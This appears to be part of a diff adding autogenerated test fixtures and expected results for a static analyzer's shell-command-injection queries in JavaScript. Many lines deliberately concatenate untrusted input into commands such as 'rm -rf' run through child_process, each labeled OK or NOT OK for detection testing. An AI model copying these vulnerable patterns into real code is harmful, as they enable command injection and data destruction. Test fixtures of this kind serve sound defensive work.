var cmd1 = "rm -rf " + name; // NOT OK.
cp.exec(cmd1);
var cmd2 = "rm -rf " + name; // NOT OK.
function myExec(cmd) {
cp.exec(cmd);
}
myExec(cmd2);
}
module.exports.stringConcat = function (name) {
cp.exec("rm -rf " + name); // NOT OK.
cp.exec(name); // OK.
cp.exec("for foo in (" + name + ") do bla end"); // OK.
cp.exec("cat /foO/BAR/" + name) // NOT OK.
cp.exec("cat \"" + name + "\"") // NOT OK.
cp.exec("cat '" + name + "'") // NOT OK.
cp.exec("cat '/foo/bar" + name + "'") // NOT OK.
cp.exec(name + " some file") // OK.
}
module.exports.arrays = function (name) {
cp.exec("rm -rf " + name); // NOT OK.
var args1 = ["node"];
args1.push(name); // NOT OK.
cp.exec(args1.join(" "));
cp.exec(["rm -rf", name].join(" ")); // NOT OK.
cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK.
cp.execFile("rm", ["-rf", name]); // OK
}
var util = require("util");
module.exports.format = function (name) {
cp.exec(util.format("rm -rf %s", name)); // NOT OK
cp.exec(util.format("rm -rf '%s'", name)); // NOT OK
cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK
cp.exec(util.format("%s foo/bar", name)); // OK
cp.exec(util.format("for foo in (%s) do bar end", name)); // OK
cp.exec(require("printf")('rm -rf %s', name)); // NOT OK
}
module.exports.valid = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!isValidName(name)) {
return;
}
cp.exec("rm -rf " + name); // OK
}
module.exports.safe = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!isSafeName(name)) {
return;
}
cp.exec("rm -rf " + name); // OK
}
class Cla4 {
wha(name) {
cp.exec("rm -rf " + name); // NOT OK
}
static bla(name) {
cp.exec("rm -rf " + name); // OK - not exported
}
constructor(name) {
cp.exec("rm -rf " + name); // OK - not exported
}
}
module.exports.cla4 = new Cla4();
function Cla5(name) {
cp.exec("rm -rf " + name); // OK - not exported
}
module.exports.cla5 = new Cla5();
module.exports.indirect = function (name) {
let cmd = "rm -rf " + name; // NOT OK
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb);
}
module.exports.indirect2 = function (name) {
let cmd = name;
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb); // OK
let cmd2 = "rm -rf " + name;
var args2 = [cmd2];
cp.spawn(
'cmd.exe',
['/C', editor].concat(args2),
{ stdio: 'inherit' }
);
}
module.exports.cmd = function (command, name) {
cp.exec("fo | " + command); // OK
cp.exec("fo | " + name); // NOT OK
}
module.exports.sanitizer = function (name) {
var sanitized = "'" + name.replace(/'/g, "'\\''") + "'"
cp.exec("rm -rf " + sanitized); // OK
var broken = "'" + name.replace(/'/g, "'\''") + "'"
cp.exec("rm -rf " + broken); // NOT OK
}
var path = require("path");
module.exports.guard = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!path.exist(name)) {
cp.exec("rm -rf " + name); // NOT OK
return;
}
cp.exec("rm -rf " + name); // OK
}
module.exports.blacklistOfChars = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (/[^A-Za-z0-9_\/:=-]/.test(name)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
}
module.exports.whitelistOfChars = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (/^[A-Za-z0-9_\/:=-]$/.test(name)) {
cp.exec("rm -rf " + name); // OK
} else {
cp.exec("rm -rf " + name); // NOT OK
}
}
module.exports.blackList2 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!/^([a-zA-Z0-9]+))?$/.test(name)) {
cp.exec("rm -rf " + name); // NOT OK
process.exit(-1);
}
cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY]
}
module.exports.accessSync = function (name) {
cp.exec("rm -rf " + name); // NOT OK
try {
path.accessSync(name);
} catch (e) {
return;
}
cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY]
}
var cleanInput = function (s) {
if (/[^A-Za-z0-9_\/:=-]/.test(s)) {
s = "'" + s.replace(/'/g, "'\\''") + "'";
s = s.replace(/^(?:'')+/g, '') // unduplicate single-quote at the beginning
.replace(/\\'''/g, "\\'"); // remove non-escaped single-quote if there are enclosed between 2 escaped
}
return s;
}
module.exports.goodSanitizer = function (name) {
cp.exec("rm -rf " + name); // NOT OK
var cleaned = cleanInput(name);
cp.exec("rm -rf " + cleaned); // OK
}
var fs = require("fs");
module.exports.guard2 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!fs.existsSync("prefix/" + name)) {
cp.exec("rm -rf prefix/" + name); // NOT OK
return;
}
cp.exec("rm -rf prefix/" + name); // OK
}
module.exports.sanitizerProperty = function (obj) {
cp.exec("rm -rf " + obj.version); // NOT OK
obj.version = "";
cp.exec("rm -rf " + obj.version); // OK
}
module.exports.Foo = class Foo {
start(opts) {
cp.exec("rm -rf " + opts.bla); // NOT OK
this.opts = {};
this.opts.bla = opts.bla
cp.exec("rm -rf " + this.opts.bla); // NOT OK
}
}
function sanitizeShellString(str) {
let result = str;
result = result.replace(/>/g, "");
result = result.replace(/</g, "");
result = result.replace(/\*/g, "");
result = result.replace(/\?/g, "");
result = result.replace(/\[/g, "");
result = result.replace(/\]/g, "");
result = result.replace(/\|/g, "");
result = result.replace(/\`/g, "");
result = result.replace(/$/g, "");
result = result.replace(/;/g, "");
result = result.replace(/&/g, "");
result = result.replace(/\)/g, "");
result = result.replace(/\(/g, "");
result = result.replace(/\$/g, "");
result = result.replace(/#/g, "");
result = result.replace(/\\/g, "");
result = result.replace(/\n/g, "");
return result
}
module.exports.sanitizer2 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
var sanitized = sanitizeShellString(name);
cp.exec("rm -rf " + sanitized); // OK
}
module.exports.typeofcheck = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (typeof name === "undefined") {
cp.exec("rm -rf " + name); // OK
} else {
cp.exec("rm -rf " + name); // NOT OK
}
}
module.exports.typeofcheck = function (arg) {
var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK
cp.exec(cmd);
}
function id(x) {
return x;
}
module.exports.id = id;
module.exports.unproblematic = function() {
cp.exec("rm -rf " + id("test")); // OK
};
module.exports.problematic = function(n) {
cp.exec("rm -rf " + id(n)); // NOT OK
};
module.exports.typeofNumber = function(n) {
if (typeof n === "number") {
cp.exec("rm -rf " + n); // OK
}
};
function boundProblem(safe, unsafe) {
cp.exec("rm -rf " + safe); // OK
cp.exec("rm -rf " + unsafe); // NOT OK
}
Object.defineProperty(module.exports, "boundProblem", {
get: function () {
return boundProblem.bind(this, "safe");
}
});
function MyTrainer(opts) {
this.learn_args = opts.learn_args
}
MyTrainer.prototype = {
train: function() {
var command = "learn " + this.learn_args + " " + model; // NOT OK
cp.exec(command);
}
};
module.exports.MyTrainer = MyTrainer;
function yetAnohterSanitizer(str) {
const s = str || '';
let result = '';
for (let i = 0; i <= 2000; i++) {
if (!(s[i] === undefined ||
s[i] === '>' ||
s[i] === '<' ||
s[i] === '*' ||
s[i] === '?' ||
s[i] === '[' ||
s[i] === ']' ||
s[i] === '|' ||
s[i] === '˚' ||
s[i] === '$' ||
s[i] === ';' ||
s[i] === '&' ||
s[i] === '(' ||
s[i] === ')' ||
s[i] === ']' ||
s[i] === '#' ||
s[i] === '\\' ||
s[i] === '\t' ||
s[i] === '\n' ||
s[i] === '\'' ||
s[i] === '`' ||
s[i] === '"')) {
result = result + s[i];
}
}
return result;
}
module.exports.sanitizer3 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
var sanitized = yetAnohterSanitizer(name);
cp.exec("rm -rf " + sanitized); // OK
}
const cp = require("child_process");
const spawn = cp.spawn;
module.exports.shellOption = function (name) {
cp.exec("rm -rf " + name); // NOT OK
cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK
cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK
cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK
cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK
const SPAWN_OPT = {shell: true};
spawn("rm", ["first", name], SPAWN_OPT); // NOT OK
var arr = [];
arr.push(name); // NOT OK
spawn("rm", arr, SPAWN_OPT);
spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`.
}
function build(first, last) {
var arr = [];
if (something() === 'gm')
arr.push('convert');
first && arr.push(first);
last && arr.push(last); // NOT OK
return arr;
};
var asyncExec = require("async-execute");
module.exports.asyncStuff = function (name) {
asyncExec("rm -rf " + name); // NOT OK
}
const myFuncs = {
myFunc: function (name) {
asyncExec("rm -rf " + name); // NOT OK
}
};
module.exports.blabity = {};
Object.defineProperties(
module.exports.blabity,
Object.assign(
{},
Object.entries(myFuncs).reduce(
(props, [ key, value ]) => Object.assign(
props,
{
[key]: {
value,
configurable: true,
},
},
),
{}
)
)
);
const path = require('path');
const {promisify} = require('util');
const exec = promisify(require('child_process').exec);
module.exports = function check(config) {
const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK
return exec(cmd);
}
module.exports.splitConcat = function (name) {
let args = ' my name is ' + name; // NOT OK
let cmd = 'echo';
cp.exec(cmd + args);
}
module.exports.myCommand = function (myCommand) {
let cmd = `cd ${cwd} ; ${myCommand}`; // OK - the parameter name suggests that it is purposely a shell command.
cp.exec(cmd);
}
(function () {
var MyThing = {
cp: require('child_process')
};
module.exports.myIndirectThing = function (name) {
MyThing.cp.exec("rm -rf " + name); // NOT OK
}
});
var imp = require('./isImported');
for (var name in imp){
module.exports[name] = imp[name];
}
module.exports.sanitizer4 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (isNaN(name)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(parseInt(name))) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(+name)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(parseInt(name, 10))) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(name - 0)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(name | 0)) { // <- not a sanitizer
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // NOT OK
}
}

9
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js generated Normal file
View File

@@ -0,0 +1,9 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - is imported from main module.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // NOT OK - is imported from main module.
};

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js generated Normal file
View File

@@ -0,0 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // OK, is not exported to a main-module.
};

6
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js generated Normal file
View File

@@ -0,0 +1,6 @@
// this file is imported from `index.js`.
define(function (require) {
return {
amdSub: require("./amdSub"),
};
});

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js generated Normal file
View File

@@ -0,0 +1,5 @@
const cp = require("child_process");
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js`
};

15
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js generated Normal file
View File

@@ -0,0 +1,15 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js
};
module.exports.amd = require("./amd.js");
module.exports.arrToShell = function (cmd, arr) {
cp.spawn("echo", arr, {shell: true}); // NOT OK
}

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts generated Normal file
View File

@@ -0,0 +1,5 @@
var cp = require("child_process")
export default function (name) {
cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file.
}

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js generated Normal file
View File

@@ -0,0 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file.
};

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts generated Normal file
View File

@@ -0,0 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged.
};

8
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js generated Normal file
View File

@@ -0,0 +1,8 @@
const dispatch = {
GET: require("./bla"),
POST: require("./subsub"),
};
module.exports.foo = function (name, type) {
dispatch[type](name);
};

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js generated Normal file
View File

@@ -0,0 +1,5 @@
const cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged.
};

166
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js generated Normal file
View File

@@ -0,0 +1,166 @@
var express = require('express');
var child_process = require('child_process');
var execSync = child_process.execSync;
var exec = child_process.exec;
var spawn = child_process.spawn;
var spawnSync = child_process.spawnSync;
var fs = require('fs');
var app = express();
exec("cat foo/bar", function (err, out) {}); // NOT OK
exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK
console.log(out);
});
execSync('cat /proc/cpuinfo').toString(); // NOT OK.
execSync(`cat ${newpath}`) // NOT OK
execSync('cat package.json | wc -l'); // OK - pipes!
execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files.
execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files.
exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes
execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options
exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes
execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync)
execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync)
execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid))
execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK.
execSync(`cat ${newpath} > ${destpath}`).toString(); // OK.
execSync(`cat ${files.join(' ')} > ${outFile}`); // OK
execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY]
exec("cat /proc/cpuinfo | grep name"); // OK - pipes
execSync(`cat ${newpath} | ${othertool}`); // OK - pipes
function cat(file) {
return execSync('cat ' + file).toString(); // NOT OK
}
execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY]
var execFile = child_process.execFile;
var execFileSync = child_process.execFileSync;
execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK
// Not using stderr
console.log(stdout);
});
execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used.
console.log(stderr);
});
execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK
// Not using stderr
console.log(stdout);
});
execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK
execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK
var opts = {encoding: 'utf8'};
execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK
var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'};
execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK
execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK
execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK
execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK.
execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK
execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat
exec("cat foo/bar", function (err, out) {}); // NOT OK
exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK
execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options.
exec("node foo/bar", (err, out) => doSomethingWith(out)); // OK - Not a call to cat
execFileSync('node', [ `cat` ]); // OK - not a call to cat
exec("cat foo/bar&", function (err, out) {}); // OK - contains &
exec("cat foo/bar,", function (err, out) {}); // OK - contains ,
exec("cat foo/bar$", function (err, out) {}); // OK - contains $
exec("cat foo/bar`", function (err, out) {}); // OK - contains `
spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (But weird API use.)
(function () {
const cat = spawn('cat', [filename]); // OK - non trivial use.
cat.stdout.on('data', (data) => {
res.write(data);
});
cat.stdout.on('end', () => res.end());
})();
var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK
console.log(notDead);
(function () {
var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
someCall(
exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess.
);
return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess.
})();
const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK.
encoding: 'utf8'
});
exec('/bin/cat', function (e, s) {}); // OK
spawn("cat") // OK
var shelljs = require("shelljs");
shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK
shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK
let cspawn = require('cross-spawn');
cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK
cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK
cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK
cspawn('cat', ['foo/bar']); // NOT OK
cspawn('cat', (err, out) => {console.log(out)}); // OK
cspawn('cat', { encoding: 'utf8' }); // OK
let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK
let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK
var execmod = require('exec');
execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK
execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK

608
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/getALikelyExternalLibraryCall.expected
View File

@@ -396,6 +396,614 @@
| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | express() |
| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | app.get ... "');\\n}) |
| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | http.cr ... Y] \\n\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | require("util") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | http.cr ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | require ... erver') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | router. ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | http.cr ... md);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | http.cr ... md);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | require ... d]);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | require('express') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | require('multer') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | multer( ... ds/' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | express() |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | app.pos ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) |
